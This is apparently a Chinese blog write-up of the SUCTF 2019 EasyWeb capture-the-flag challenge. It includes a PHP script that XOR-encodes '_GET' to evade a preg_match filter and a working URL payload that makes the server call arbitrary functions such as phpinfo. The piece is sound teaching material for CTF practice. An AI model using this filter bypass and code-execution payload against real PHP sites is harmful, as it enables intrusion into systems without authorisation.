[SUCTF 2019]EasyWeb 1

最新推荐文章于 2024-08-24 22:16:54 发布

落魚京

最新推荐文章于 2024-08-24 22:16:54 发布

阅读量353

点赞数 1

分类专栏： ctf 文章标签： web 安全

本文链接：https://blog.csdn.net/m0_50967960/article/details/119677444

版权

ctf 专栏收录该内容

6 篇文章 0 订阅

订阅专栏

网上wp已经很多了，那么分享一个超级非预期解哈哈哈哈
先说说考察知识点

考察点

php正则绕过
文件上传木马绕过
bypass open_basedir

非预期

正则绕过
背景：https://www.cnblogs.com/cimuhuashuimu/p/11546422.html

异或绕过preg_match脚本如下：

<?php
$l = "";
$r = "";
$argv = str_split("_GET");
for($i=0;$i<count($argv);$i++)
{   
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);      \\dechex(255) = ff
        if($k == $argv[$i]){
        	if($j<16){
        		$l .= "%ff";
                $r .= "%0" . dechex($j);
        		continue;
        	}
            $l .= "%ff";
            $r .= "%" . dechex($j);
            continue;
        }
    }
}
echo "\{$l`$r\}";
?>

输出：

{%ff%ff%ff%ff`%a0%b8%ba%ab}

payload ?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
传入后实际为：?_=${_GET}{%ff}();&%ff=phpinfo
在这里插入图片描述

非预期
直接网页内容查找：flag

end

靶场：https://buuoj.cn/challenges#[SUCTF%202019]EasyWeb
其他师傅文章：https://www.cnblogs.com/hello-there/p/13039116.html

落魚京

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[SUCTF 2019]EasyWeb 1

网上wp已经很多了，那么分享一个超级非预期解哈哈哈哈先说说考察知识点考察点php正则绕过文件上传木马绕过bypass open_basedir非预期正则绕过背景：https://www.cnblogs.com/cimuhuashuimu/p/11546422.html异或绕过preg_match脚本如下：<?php$l = "";$r = "";$argv = str_split("_GET");for($i=0;$i<count($argv);$i++)
复制链接

扫一扫

专栏目录